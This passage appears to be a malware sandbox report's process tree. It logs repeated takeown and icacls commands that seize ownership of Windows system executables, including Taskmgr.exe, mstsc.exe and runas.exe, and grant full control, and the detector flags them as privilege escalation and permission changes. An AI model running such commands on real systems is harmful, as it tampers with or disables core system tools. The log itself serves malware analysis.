- Suspicious use of AdjustPrivilegeToken
PID:4116 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2568
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3892 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4568 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3440
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3164
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1468 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4784 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4488 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4964
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4620
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:980 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3556 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3280 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1236
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3916
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3328
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3312 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4468
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3260
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3248 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1732 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4336
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3412
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3140
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3004
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4540
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3348
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5004 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4452
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2580
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:224
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1464 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:5112
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1196
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2680 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1472 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4276 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4280 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2340
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2216
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1800 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3452
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:3608 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3088 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1876 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1556 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1212 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3896 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4000
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3604
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4332
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:4888 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4156
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3936
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4432
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4056
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4484 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2924
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:928 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2104 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1700 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2024 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4424
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1668
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2712 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3924 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1612 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2076 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:2820 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2784
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2248 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4524
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2484
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1368 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5036
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3468
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3688
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2212
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1064
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4724
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1780 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1952 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4768
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:848
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4200
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4052
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3908
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4944
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:3960 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2736
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:764
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3940
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2832
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4588
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1304 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2772 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2972
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1724
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:392 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:4860 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3932 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:220
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2348 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:2068
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3912
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3036 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3468
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:1876 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2680
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:5112
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4724
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2472
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3312
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4336 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:1732
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4768
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:5088 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4364
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4196
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1348 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:4440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1636 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2728 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4644
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2736 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3632 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3600
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3564
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
PID:1920 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2580
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:4136
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:940
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2248 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:848
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3328 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Modifies file permissions
PID:2784 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\Taskmgr.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1524 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S OZMCVSQS /U Admin /F "C:\Windows\System32\Taskmgr.exe"2⤵PID:3260
-
